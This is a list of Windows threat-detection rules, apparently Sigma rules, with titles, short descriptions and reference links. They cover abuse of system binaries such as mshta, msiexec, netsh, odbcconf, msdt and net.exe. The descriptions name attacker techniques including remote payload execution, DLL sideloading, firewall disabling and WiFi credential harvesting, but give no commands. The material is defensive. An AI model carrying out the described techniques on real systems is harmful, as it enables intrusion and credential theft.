CodePage Modification Via MODE.COM To Russian Language Detects a CodePage modification using the "mode.com" utility to Russian language. This behavior has been used by threat actors behind Dharma ransomware. https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode, https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html, https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior
Potential Suspicious Mofcomp Execution Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. Attackers abuse this utility to install malicious MOF scripts https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/, https://github.com/The-DFIR-Report/Sigma-Rules/blob/75260568a7ffe61b2458ca05f6f25914efb44337/win_mofcomp_execution.yml, https://learn.microsoft.com/en-us/windows/win32/wmisdk/mofcomp
Potential Mpclient.DLL Sideloading Via Defender Binaries Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory. https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool
File Download Via Windows Defender MpCmdRun.EXE Detects the use of Windows Defender MpCmdRun.EXE to download files https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866, https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
Suspicious Msbuild Execution By Uncommon Parent Process Detects suspicious execution of 'Msbuild.exe' by an uncommon parent process https://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/, https://www.echotrail.io/insights/search/msbuild.exe
Windows Defender Definition Files Removed Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/
Potential Arbitrary Command Execution Using Msdt.EXE Detects processes leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/, https://twitter.com/_JohnHammond/status/1531672601067675648
Suspicious Cabinet File Execution Via Msdt.EXE Detects execution of msdt.exe using the "cab" flag which could indicate suspicious diagcab files with embedded answer files leveraging CVE-2022-30190 https://twitter.com/nas_bench/status/1537896324837781506, https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
Arbitrary File Download Via MSEDGE_PROXY.EXE Detects usage of "msedge_proxy.exe" to download arbitrary files https://lolbas-project.github.io/lolbas/Binaries/msedge_proxy/
Suspicious MSDT Parent Process Detects msdt.exe executed by a suspicious parent as seen in CVE-2022-30190 / Follina exploitation https://twitter.com/nao_sec/status/1530196847679401984, https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/
Remotely Hosted HTA File Executed Via Mshta.EXE Detects execution of the "mshta" utility with an argument containing the "http" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file https://www.trendmicro.com/en_us/research/22/e/avoslocker-ransomware-variant-abuses-driver-file-to-disable-anti-Virus-scans-log4shell.html
Wscript Shell Run In CommandLine Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html, https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/
Suspicious JavaScript Execution Via Mshta.EXE Detects execution of JavaScript code using "mshta.exe". https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md
Potential LethalHTA Technique Execution Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process https://codewhitesec.blogspot.com/2018/07/lethalhta.html
Suspicious MSHTA Child Process Detects a suspicious process spawning from an "mshta.exe" process, which could be indicative of a malicious HTA script execution https://www.trustedsec.com/july-2015/malicious-htas/
MSHTA Suspicious Execution 01 Detection for mshta.exe suspicious execution patterns sometimes involving file polyglotism http://blog.sevagas.com/?Hacking-around-HTA-files, https://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356, https://learn.microsoft.com/en-us/previous-versions/dotnet/framework/data/xml/xslt/xslt-stylesheet-scripting-using-msxsl-script, https://medium.com/tsscyber/pentesting-and-hta-bypassing-powershell-constrained-language-mode-53a42856c997, https://twitter.com/mattifestation/status/1326228491302563846
Suspicious Mshta.EXE Execution Patterns Detects suspicious mshta process execution patterns https://en.wikipedia.org/wiki/HTML_Application, https://www.echotrail.io/insights/search/mshta.exe, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
DllUnregisterServer Function Call Via Msiexec.EXE Detects MsiExec loading a DLL and calling its DllUnregisterServer function https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://lolbas-project.github.io/lolbas/Binaries/Msiexec/, https://twitter.com/_st0pp3r_/status/1583914515996897281
Suspicious MsiExec Embedding Parent Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md
Suspicious Msiexec Execute Arbitrary DLL Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914515996897281
Msiexec Quiet Installation Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi) https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md, https://twitter.com/_st0pp3r_/status/1583914244344799235
Suspicious Msiexec Quiet Install From Remote Location Detects usage of Msiexec.exe to install packages hosted remotely quietly https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
Potential MsiExec Masquerading Detects the execution of msiexec.exe from an uncommon directory https://twitter.com/200_okay_/status/1194765831911215104
MsiExec Web Install Detects suspicious msiexec process starts with web addresses as parameter https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
Arbitrary File Download Via MSOHTMED.EXE Detects usage of "MSOHTMED" to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/238/files
Arbitrary File Download Via MSPUB.EXE Detects usage of "MSPUB" (Microsoft Publisher) to download arbitrary files https://github.com/LOLBAS-Project/LOLBAS/pull/238/files
Potential Process Injection Via Msra.EXE Detects potential process injection via Microsoft Remote Assistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/, https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf
Detection of PowerShell Execution via Sqlps.exe This rule detects execution of PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. https://learn.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/, https://twitter.com/bryon_/status/975835709587075072
SQL Client Tools PowerShell Session Detection This rule detects execution of PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with Microsoft SQL Server Management Studio. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml, https://twitter.com/pabraeken/status/993298228840992768
Suspicious Child Process Of SQL Server Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection. Internal Research
Suspicious Child Process Of Veeam Database Detects suspicious child processes of the Veeam service process. This could indicate potential RCE or SQL Injection. https://labs.withsecure.com/publications/fin7-target-veeam-servers
Potential MSTSC Shadowing Activity Detects RDP session hijacking by using MSTSC shadowing https://twitter.com/kmkz_security/status/1220694202301976576, https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet
New Remote Desktop Connection Initiated Via Mstsc.EXE Detects the usage of "mstsc.exe" with the "/v" flag to initiate a connection to a remote server. Adversaries may use valid accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#t1021001---remote-desktop-protocol, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc
Mstsc.EXE Execution With Local RDP File Detects potential RDP connection via Mstsc using a local ".rdp" file https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Suspicious Mstsc.EXE Execution With Local RDP File Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Mstsc.EXE Execution From Uncommon Parent Detects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations. https://www.blackhillsinfosec.com/rogue-rdp-revisiting-initial-access-methods/, https://web.archive.org/web/20230726144748/https://blog.thickmints.dev/mintsights/detecting-rogue-rdp/
Msxsl.EXE Execution Detects the execution of the MSXSL utility. This can be used to execute Extensible Stylesheet Language (XSL) files. These files are commonly used to describe the processing and rendering of data within XML files. Adversaries can abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/
Remote XSL Execution Via Msxsl.EXE Detects the execution of the "msxsl" binary with an "http" keyword in the command line. This might indicate a potential remote execution of XSL files. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msxsl/
New Firewall Rule Added Via Netsh.EXE Detects the addition of a new rule to the Windows firewall via netsh https://web.archive.org/web/20190508165435/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf
Suspicious Program Location Whitelisted In Firewall Via Netsh.EXE Detects Netsh command execution that whitelists a program located in a suspicious location in the Windows Firewall https://www.virusradar.com/en/Win32_Kasidet.AD/description, https://www.hybrid-analysis.com/sample/07e789f4f2f3259e7559fdccb36e96814c2dbff872a21e1fa03de9ee377d581f?environmentId=100
RDP Connection Allowed Via Netsh.EXE Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware https://labs.sentinelone.com/sarwent-malware-updates-command-detonation/
Firewall Rule Deleted Via Netsh.EXE Detects the removal of a port or application rule in the Windows Firewall configuration using netsh https://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/
Firewall Disabled via Netsh.EXE Detects netsh commands that turn off the Windows firewall https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/, https://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall
Netsh Allow Group Policy on Microsoft Defender Firewall Adversaries may modify system firewalls in order to bypass controls limiting network usage https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall, https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/netsh-advfirewall-firewall-control-firewall-behavior
Firewall Configuration Discovery Via Netsh.EXE Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-2---list-windows-firewall-rules, https://ss64.com/nt/netsh.html
Firewall Rule Update Via Netsh.EXE Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of an existing rule https://ss64.com/nt/netsh.html
Potential Persistence Via Netsh Helper DLL Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md, https://github.com/outflanknl/NetshHelperBeacon, https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/
New Network Trace Capture Started Via Netsh.EXE Detects the execution of netsh with the "trace" flag in order to start a network capture https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/, https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/
New Port Forwarding Rule Added Via Netsh.EXE Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html, https://adepts.of0x.cc/netsh-portproxy-code/, https://www.dfirnotes.net/portproxy_detection/
RDP Port Forwarding Rule Added Via Netsh.EXE Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
Harvesting Of Wifi Credentials Via Netsh.EXE Detect the harvesting of wifi credentials using netsh.exe https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
Suspicious Group And Account Reconnaissance Activity Using Net.EXE Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE. Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
Unmount Share Via Net.EXE Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md
Start Windows Service Via Net.EXE Detects the usage of the "net.exe" command to start a service using the "start" flag https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md
New User Created Via Net.EXE Identifies the creation of local users via the net.exe command. https://eqllib.readthedocs.io/en/latest/analytics/014c3f51-89c6-40f1-ac9c-5688f26090ab.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md
New User Created Via Net.EXE With Never Expire Option Detects creation of local users via the net.exe command with the option "never expire" https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
Suspicious Manipulation Of Default Accounts Via Net.EXE Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/, https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
Windows Admin Share Mount Via Net.EXE Detects when an admin share is mounted using net.exe https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Stop Windows Service Via Net.EXE Detects the stopping of a Windows service via the "net" utility. https://ss64.com/nt/net-service.html
Password Provided In Command Line Of Net.EXE Detects when net.exe is called with a password in the command line Internal Research
Windows Internet Hosted WebDav Share Mount Via Net.EXE Detects when an internet hosted webdav share is mounted using the "net.exe" utility https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Windows Share Mount Via Net.EXE Detects when a share is mounted using the "net.exe" utility https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
System Network Connections Discovery Via Net.EXE Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery
Share And Session Enumeration Using Net.EXE Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Nltest.EXE Execution Detects nltest commands that can be used for information discovery https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm
Potential Arbitrary Code Execution Via Node.EXE Detects the execution of node.exe, which is shipped with multiple software packages such as VMware, Adobe...etc., in order to execute arbitrary code. For example, to establish a reverse shell as seen in Log4j attacks...etc http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return, https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/, https://nodejs.org/api/cli.html
Potential Recon Activity Via Nltest.EXE Detects nltest commands that can be used for information discovery https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11), https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html, https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest
Node Process Executions Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud https://twitter.com/mttaggart/status/1511804863293784064
Network Reconnaissance Activity Detects a set of suspicious network related commands often used in recon stages https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
Nslookup PowerShell Download Cradle - ProcessCreation Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records https://twitter.com/Alh4zr3d/status/1566489367232651264
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11), https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
Driver/DLL Installation Via Odbcconf.EXE Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Suspicious Driver/DLL Installation Via Odbcconf.EXE Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
New DLL Registered Via Odbcconf.EXE Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://redcanary.com/blog/raspberry-robin/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Odbcconf.EXE Suspicious DLL Location Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html, https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
Potentially Suspicious DLL Registered Via Odbcconf.EXE Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension, which is often used as a method to evade defenses. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Response File Execution Via Odbcconf.EXE Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Suspicious Response File Execution Via Odbcconf.EXE Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Uncommon Child Process Spawned By Odbcconf.EXE Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac
Potential Arbitrary File Download Using Office Application Detects potential arbitrary file download using a Microsoft Office application https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922, https://github.com/grayhatkiller/SharpExShell, https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication
Potentially Suspicious Office Document Executed From Trusted Location Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often use this to avoid macro security and execute their malicious code. Internal Research, https://twitter.com/Max_Mal_/status/1633863678909874176, https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465, https://twitter.com/_JohnHammond/status/1588155401752788994
OneNote.EXE Execution of Malicious Embedded Scripts Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. https://bazaar.abuse.ch/browse/tag/one/
Suspicious Microsoft OneNote Child Process Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18, https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0
Outlook EnableUnsafeClientMailRules Setting Enabled Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44, https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048
Suspicious Execution From Outlook Temporary Folder Detects a suspicious program execution in Outlook temp folder Internal Research
Suspicious Outlook Child Process Detects a suspicious process spawning from an Outlook process. https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Suspicious Remote Child Process From Outlook Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). https://github.com/sensepost/ruler, https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49
Suspicious Binary In User Directory Spawned From Office Application Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign, https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57
Potential Arbitrary DLL Load Using Winword Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py
Suspicious Microsoft Office Child Process Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml, https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html, https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution Detects execution of Windows Defender "OfflineScannerShell.exe" from its non-standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL sideloading and will load any DLL named "mpclient.dll" from the current working directory. https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/
